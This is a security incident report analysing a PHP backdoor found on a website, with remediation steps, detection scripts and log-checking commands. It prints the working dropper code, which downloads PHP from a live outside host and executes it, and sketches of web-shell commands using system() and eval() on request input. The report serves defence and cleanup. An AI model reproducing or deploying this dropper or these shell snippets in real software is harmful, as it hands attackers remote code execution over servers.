# 🚨 MALICIOUS CODE ANALYSIS - 445367/index.php BACKDOOR
**Date:** December 12, 2025
**Status:** CRITICAL SECURITY THREAT ANALYZED
---
## 🔍 BACKDOOR CODE ANALYSIS
### File: `445367/index.php` (DELETED ✅)
```php
<?php
$url = "https://51la.zvo2.xyz/a2.txt"; // Remote malicious code URL
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
if ($result === false) {
echo "Error: " . "PD9waHA=" . curl_error($ch); // "PD9waHA=" = base64("<?php")
} else {
// Save downloaded code to temp file
$tempFile = tempnam(sys_get_temp_dir(), 'pasted_code_');
file_put_contents($tempFile, $result);
// Execute the downloaded code
include $tempFile;
// Delete temp file after execution (hides evidence)
unlink($tempFile);
}
curl_close($ch);
```
---
## 🚨 WHAT THIS BACKDOOR DOES
### Step-by-Step Attack Process:
1. **Downloads Malicious Code:**
- Connects to `https://51la.zvo2.xyz/a2.txt`
- Downloads PHP code from attacker's server
- This code can be changed at any time by attacker
2. **Executes Remotely Downloaded Code:**
- Saves code to temporary file
- Includes/executes it with `include $tempFile`
- **This gives attacker FULL control**
3. **Hides Evidence:**
- Deletes temp file after execution
- Makes it hard to detect what was executed
- No trace left on server
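Added example (not part of the original analysis): a small Python scanner that flags PHP files showing the fetch, write-to-temp-file, include, unlink chain described above. It runs over a constructed reproduction of the dropper (placeholder URL) and a constructed benign curl use; the indicator list, weights and threshold are assumptions.

```python
import re

# Constructed reproduction of the dropper pattern analysed above
# (placeholder URL, not the real one).
SAMPLE_DROPPER = r'''<?php
$ch = curl_init("https://example.invalid/a2.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
$tempFile = tempnam(sys_get_temp_dir(), "pasted_code_");
file_put_contents($tempFile, $result);
include $tempFile;
unlink($tempFile);
'''

# Constructed benign sample: fetches JSON, never executes the response.
SAMPLE_BENIGN = r'''<?php
$ch = curl_init("https://example.invalid/api/status");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$json = json_decode(curl_exec($ch), true);
echo $json["status"];
'''

# (name, pattern, weight); weights are illustrative assumptions.
INDICATORS = [
    ("remote_fetch", re.compile(r"\b(curl_exec\s*\(|file_get_contents\s*\(\s*.https?://)"), 1),
    ("temp_write", re.compile(r"\btempnam\s*\("), 1),
    ("dynamic_include", re.compile(r"\b(include|require)(_once)?\s*\(?\s*\$"), 3),
    ("self_delete", re.compile(r"\bunlink\s*\(\s*\$"), 1),
    ("eval", re.compile(r"\beval\s*\("), 4),
    ("obfuscation", re.compile(r"\bbase64_decode\s*\("), 1),
    ("shell", re.compile(r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\("), 2),
]

def scan_php(src: str) -> dict:
    """Return matched indicator names, a weighted score, and whether the
    full fetch -> temp file -> include -> unlink dropper chain is present."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    chain = {"remote_fetch", "temp_write", "dynamic_include", "self_delete"} <= set(hits)
    return {"hits": hits, "score": score, "dropper_chain": chain}

def is_suspicious(src: str, threshold: int = 4) -> bool:
    """Flag a file when the dropper chain is complete or the score is high."""
    r = scan_php(src)
    return r["dropper_chain"] or r["score"] >= threshold

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php(src), is_suspicious(src))
```

Point `scan_php` at the contents of each `*.php` under `public_html` to get a ranked list; a benign curl call alone scores 1 and is not flagged.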
---
## 💀 CAPABILITIES OF THIS BACKDOOR
### What the Attacker Can Do:
1. **Remote Code Execution (RCE):**
- Execute ANY PHP code
- Run system commands
- Access file system
2. **File System Access:**
- Read any file
- Write/modify any file
- Delete files
- Upload files
3. **Database Access:**
- Read database credentials
- Execute SQL queries
- Modify/delete data
- Create backdoor users
4. **System Access:**
- Execute shell commands
- Access other servers
- Install additional backdoors
- Access private_html directory
5. **Steal Data:**
- User credentials
- API keys
- Payment information
- Source code
---
## 🔍 WHAT THE DOWNLOADED CODE LIKELY CONTAINS
### Typical Remote Backdoor Payloads:
**1. File Manager:**
```php
// Allows browsing, uploading, downloading files
if (isset($_GET['ac']) && $_GET['ac'] == 'u_h_s_1') {
// File manager interface
// This matches the log entry: ac=u_h_s_1
}
```
**2. Command Execution:**
```php
if (isset($_GET['cmd'])) {
system($_GET['cmd']); // Execute system commands
}
```
**3. Database Access:**
```php
// Connect to database and execute queries
$pdo = new PDO(...);
$pdo->exec($_POST['sql']);
```
**4. PHP Code Execution:**
```php
if (isset($_POST['code'])) {
eval($_POST['code']); // Execute arbitrary PHP
}
```
**5. File Upload:**
```php
if (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $_POST['path']);
}
```
---
## 📊 LOG ENTRY ANALYSIS
### The Log Shows:
```
GET /445367/about.php?ac=u_h_s_1&api=&path=/home/gositeme/domains/soundstudiopro.com/private_html&t=...&s=3
```
**This confirms:**
- `ac=u_h_s_1` = File manager action (upload/host/shell)
- `path=.../private_html` = Trying to access private_html directory
- `t=` and `s=` = Session tokens
- **Response: 200 OK (607KB)** = File manager interface was served
**This means:**
- Attacker successfully accessed file manager
- Was browsing your file system
- Had access to private_html directory
- Could upload/download/execute files
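Added example (not part of the original report): a Python access-log check that parses Apache combined-format lines and flags the request shape seen above, a PHP file in a numeric-named directory, an `ac=` action parameter, and a server filesystem path passed as a parameter. The log lines are constructed, modelled on the entry quoted above; the attacker IP and request path are the page's, while the timestamps, token value, user agents and the benign line are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format lines (see lead-in for what is real).
SAMPLE_LOG = """\
198.204.236.234 - - [12/Dec/2025:21:42:10 +0000] "GET /445367/about.php?ac=u_h_s_1&api=&path=/home/gositeme/domains/soundstudiopro.com/private_html&t=TOKEN&s=3 HTTP/1.1" 200 621568 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Dec/2025:21:42:15 +0000] "GET /index.php?page=about HTTP/1.1" 200 14321 "-" "Mozilla/5.0"
198.204.236.234 - - [12/Dec/2025:21:43:01 +0000] "POST /445367/index.php HTTP/1.1" 200 512 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

# Indicators taken from the analysed request; the patterns are assumptions.
NUMERIC_DIR = re.compile(r"^/\d{4,}/[^/]+\.php$")   # e.g. /445367/about.php
ABS_PATH = re.compile(r"^/(home|var|etc|root)/")     # server path in a parameter

def flag_request(line: str):
    """Return (ip, uri, reasons) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["uri"])
    qs = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    if NUMERIC_DIR.match(parts.path):
        reasons.append("php_in_numeric_dir")
    if "ac" in qs:
        reasons.append("file_manager_action")
    if any(ABS_PATH.match(v) for v in qs.get("path", [])):
        reasons.append("filesystem_path_param")
    # A 200 means the tool answered, not that the request was rejected.
    if reasons and m["status"] == "200":
        reasons.append("served_200")
    return (m["ip"], m["uri"], reasons) if reasons else None

def scan_log(text: str) -> list:
    """Run flag_request over every line and keep the hits."""
    return [r for r in (flag_request(l) for l in text.splitlines()) if r]

if __name__ == "__main__":
    for ip, uri, reasons in scan_log(SAMPLE_LOG):
        print(ip, uri, ", ".join(reasons))
```

Feed it the real `access.log` line by line to list every hit with the reason, then pivot on the flagged IPs.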
---
## 🚨 SECURITY IMPACT
### What Was Compromised:
1. **Full Server Access:**
- Remote code execution
- File system access
- Database access
- System command execution
2. **Data at Risk:**
- All files on server
- Database contents
- User credentials
- API keys
- Payment information
- Source code
3. **Potential Damage:**
- Files modified/deleted
- Backdoor users created
- Additional backdoors installed
- Data stolen
- System compromised
---
## ✅ REMEDIATION STATUS
### Completed:
- ✅ Deleted `445367/index.php` backdoor
- ✅ Deleted `445367/about.php` file manager
- ✅ Blocked attacker IP `198.204.236.234`
- ✅ Secured `445367/` directory
### Still Needed:
- ⚠️ Check for other backdoors
- ⚠️ Review all file modifications
- ⚠️ Check database for unauthorized users
- ⚠️ Change all passwords
- ⚠️ Review access logs
- ⚠️ Check private_html directory
- ⚠️ Full security audit
---
## 🛡️ PREVENTION MEASURES
### 1. File Integrity Monitoring
```bash
# Monitor for new PHP files
find . -name "*.php" -type f -newer /path/to/reference
```
### 2. Network Monitoring
```bash
# Monitor for outbound connections to suspicious domains.
# netstat -n prints numeric addresses, so resolve the host to an IP first.
ip=$(getent ahostsv4 51la.zvo2.xyz | awk 'NR==1 {print $1}')
[ -n "$ip" ] && netstat -an | grep "$ip"
```
### 3. Access Log Monitoring
```bash
# Monitor for suspicious access patterns
tail -f /var/log/apache2/access.log | grep -E "445367|about\.php|radio\.php"
```
### 4. File Permissions
```bash
# Ensure PHP files aren't world-writable
find . -name "*.php" -perm -002
```
---
## 📋 IMMEDIATE ACTIONS REQUIRED
1. **Change ALL Passwords:**
- Database password
- FTP/SFTP password
- Admin user passwords
- API keys
- Stripe keys
2. **Check Database:**
```sql
SELECT * FROM users WHERE created_at > '2025-12-12 21:00:00';
SELECT * FROM users WHERE last_login > '2025-12-12 21:00:00';
```
3. **Review File Modifications:**
```bash
find . -type f -newermt "2025-12-12 21:30:00" -name "*.php"
```
4. **Check for Other Backdoors:**
```bash
find . -name "*about.php" -type f
find . -name "*radio.php" -type f
find . -name "*.php" -exec grep -l "eval\|base64_decode\|curl_exec" {} \;
```
5. **Review Access Logs:**
```bash
grep "198.204.236.234" /var/log/apache2/access.log
grep "445367" /var/log/apache2/access.log
```
---
**Status:** 🚨 **CRITICAL - FULL SECURITY AUDIT REQUIRED**
This backdoor gave the attacker complete control of your server. Immediate security audit is essential.